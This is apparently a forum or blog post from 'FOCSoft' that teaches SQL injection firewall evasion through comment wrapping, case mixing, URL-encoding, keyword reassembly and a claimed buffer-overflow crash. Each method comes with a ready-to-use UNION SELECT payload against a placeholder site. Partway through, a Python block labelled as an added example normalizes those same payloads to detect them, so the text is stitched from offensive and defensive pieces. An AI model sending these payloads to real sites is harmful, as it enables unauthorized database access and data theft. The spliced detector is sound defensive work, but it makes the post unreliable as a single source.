
Web Application Firewall Bypassing Methods - FOCSoft

Basic Of Advanced WAF Bypassing Methods
Assalamu Alaikum
Dear
...:::Friends & Visitors:::...

What is WAF ?
WAF stands for Web Application Firewall. It is widely used nowadays to detect and block SQL injection attempts!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL injection (usually the “UNION SELECT” statement), you get a 403 error (and the website says “Forbidden” or “Not Acceptable”).
Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)

However, most WAFs recognise this method, so they still show a “Forbidden” error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAFs!

3) Combine the previous Methods:
What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:
Some firewalls remove the “UNION SELECT” statement when it is found in the URL… We can take advantage of that behaviour like this:
 
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” :-D )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(%55 is the URL-encoded form of “U” and %53 of “S”. See more in the Advanced section….)

I believe that these are the most basic methods of WAF bypassing! Let’s move on to more advanced ones…


Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many firewalls are written in C/C++, and we can crash them using a buffer overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test whether the WAF can be crashed by requesting:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500 error, you can exploit it using the Buffer Overflow method! ))

2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-Encoded) Values.
Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):
 http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from “UNION SELECT”, other commands might be blocked.
Common Commands Blocked:

COMMAND        | WHAT TO USE INSTEAD
@@version      | version()
concat()       | concat_ws()  (difference between concat() and concat_ws(): http://is.gd/VEeiDU)
group_concat() | concat_ws()

Learning MySQL really helps with such issues! ;-)

4) Misc Exploitable Functions:
Many firewalls try to offer more protection by adding prototype or unusual functions (which, of course, we can exploit!):
Example:

The firewall below replaces “*” (asterisks) with whitespace! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…

(If the firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
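Every bypass in the Basic and Advanced sections above exploits one of two filter mistakes: matching the raw request bytes, or rewriting the request (removing “*”, removing “union”/“select”) and forwarding the result without inspecting it again. The Python below is an added example, not code from the original post: it runs the post’s own payloads through a normalizer (URL-decoding, unwrapping MySQL /*!...*/ comments, folding “+” and parentheses to whitespace) and then re-checks the value after each rewrite a sanitizing WAF would apply, so the keywords reassembled in section 4 and the “Misc” example are caught as well. The sample list and the REWRITES rules are assumptions constructed for this demonstration.

```python
import re
from urllib.parse import unquote

# Payloads quoted from the post above, gathered here as constructed test input.
SAMPLES = [
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",       # basic 1: version comments
    "-15 uNIoN sELecT 1,2,3,4",                 # basic 2: case change
    "-15 UNIunionON SELselectECT 1,2,3,4",      # basic 4: keyword reassembly
    "-15 %55nION/**/%53ElecT 1,2,3,4",          # basic 5: comment + %-encoding
    "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",   # advanced 2: hex inside comment
    "-15+uni*on+sel*ect+1,2,3,4",               # advanced 4: relies on '*' removal
    "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4",
]

NAIVE = re.compile(r"UNION\s+SELECT")            # a literal rule on the raw bytes
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)

# Rewrites a "sanitizing" WAF applies before forwarding (assumed rules, modelled
# on the '*' removal and the single-pass keyword removal described in the post).
REWRITES = [re.compile(r"\*"), re.compile(r"union|select", re.I)]

def normalize(raw: str) -> str:
    """Canonicalize a query-string value before any rule is evaluated."""
    s = raw
    for _ in range(3):                           # bounded: covers double-encoding
        dec = unquote(s)
        if dec == s:
            break
        s = dec
    s = re.sub(r"/\*!\d{0,5}", " ", s)           # MySQL executes /*!...*/ contents
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # ordinary comments are noise
    s = re.sub(r"\*/", " ", s)                   # closers left over from /*! openers
    return re.sub(r"[+()\s]+", " ", s).strip()   # '+' is a URL space; parens too

def is_flagged(raw: str, max_rounds: int = 10) -> bool:
    """Inspect the normalized value, then re-inspect after every rewrite the WAF
    itself performs, until nothing changes; never trust a single stripping pass."""
    s = normalize(raw)
    for _ in range(max_rounds):
        if UNION_SELECT.search(s):
            return True
        for pat in REWRITES:                     # apply one rewrite, then look again
            nxt = pat.sub("", s)
            if nxt != s:
                s = nxt
                break
        else:
            return False                         # stable and still clean
    return True                                  # never stabilized: fail closed
```

Against these seven payloads the literal NAIVE rule matches none of them, while is_flagged catches all seven and still lets plain values such as "15" through.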

If you need any kind of help, reply here.

Please share this post with your friends :) FOCSoft
Thanks for reading,
Administrator Of FOCSoft